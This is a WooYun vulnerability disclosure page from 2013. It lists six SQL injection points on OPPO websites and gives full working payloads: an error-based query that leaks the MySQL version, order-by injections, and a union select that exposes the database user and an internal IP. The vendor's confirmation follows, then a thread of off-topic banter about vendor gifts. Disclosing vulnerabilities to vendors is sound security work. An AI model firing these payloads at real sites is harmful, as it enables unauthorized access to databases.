当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-019676

漏洞标题:OPPO注入漏洞大礼包,数据库信息泄露

相关厂商:广东欧珀移动通讯有限公司

漏洞作者: kobin97

提交时间:2013-03-07 14:47

修复时间:2013-04-21 14:48

公开时间:2013-04-21 14:48

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-03-07: 细节已通知厂商并且等待厂商处理中
2013-03-07: 厂商已经确认,细节仅向厂商公开
2013-03-17: 细节向核心白帽子及相关领域专家公开
2013-03-27: 细节向普通白帽子公开
2013-04-06: 细节向实习白帽子公开
2013-04-21: 细节向公众公开

简要描述:

OPPO注入礼包

详细说明:

注入点1:
http://www.oppo.com/?q=software&d=ASCx
order by 类型注入
http://www.oppo.com/?q=software&d=ASC,%28select%201%20from%28select%20count%28*%29,concat%280x7c,%28select%20%28Select%20version%28%29%29%20from%20information_schema.tables%20limit%200,1%29,0x7c,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1%29a%29
error number: 1062; error message: Duplicate entry '|5.5.19-log|1' for key 'group_key'

oppo.png


注入点2:
http://union.oppo.com/?act=u_itemlist&queryinput=sdfsf%27fs
注入点3:
http://union.oppo.com/?act=u_example_more&itemid=862%27
注入点4:
http://www.oppo.com/index.php?q=mp3/product/detail&name=X7%27
Zandy_Mysql error
The query result is false.
error number: 1064; error message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' LIMIT 1' at line 1
SQL: SELECT * FROM oppo_mp3 WHERE 1 AND name='X7'' AND status='1' LIMIT 1
注入点5:
http://theme.oppo.com/?q=index/list&model=A209&sortby=downloads%20asc
http://theme.oppo.com/?q=index/moreRecom&model=A209&sortby=downloads&order=DESC
这两个都是order by 类型注入
注入点6:
http://www.oppo.com/?q=interface/editor&name=x905%27&fid=209
http://www.oppo.com/?q=interface/editor&name=x905%27%20and%201=2%20union%20select%201,user%28%29,3%23&fid=209
"title":"oppo_www@192.168.1.87"
就暂时这么多吧。。

漏洞证明:

上面已经证明

修复方案:

过虑,转换

版权声明:转载请注明来源 kobin97@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-03-07 17:11

厂商回复:

谢谢对OPPO的关注,部分已废弃网站尽快停用,有问题网站我们尽快修正。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-03-07 14:48 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    大牛是来求礼物的吧:D

  2. 2013-03-07 14:52 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    结贴 这丫厂商不给力啊

  3. 2013-03-07 16:56 | Rookie ( 普通白帽子 | Rank:288 漏洞数:78 | 123)

    @xsser 17173 更不给力..厂商 17173游戏 给你发送了礼物,提醒你注意查收。如果已收到礼物,请 确认 就这样忽悠我....

  4. 2013-03-07 16:57 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    @Rookie 爱丽网刷屏幕送礼物,没一个人收到!

  5. 2013-03-07 16:58 | Rookie ( 普通白帽子 | Rank:288 漏洞数:78 | 123)

    @se55i0n 现在厂商都开始忽悠人了...

  6. 2013-03-07 17:04 | leaf ( 普通白帽子 | Rank:948 漏洞数:121 | 真的没影响么?)

    @xsser @Rookie @se55i0n 建议经过洞主确认才显示...@xsser 未审核漏洞求审核!

  7. 2013-03-07 17:19 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    为什么猪肉给分这么低呢

  8. 2013-03-07 17:27 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    @se55i0n 好像送了洗面奶,还好是男士的,没有写公司名

  9. 2013-03-07 18:11 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @se55i0n 亲,爱丽的我收到了,男士保湿霜。。。。。。。。粗皮老脸的我拿它干啥。。。。

  10. 2013-03-07 19:00 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    @小胖胖要减肥 @小胖子 送给男朋友用!

  11. 2013-03-07 20:51 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    @se55i0n @小胖子 小胖子你可以找se55i0n 搞他菊花去了

  12. 2013-03-08 09:57 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    @小胖胖要减肥 @小胖子 难道就我没收到爱丽的礼物 -_-||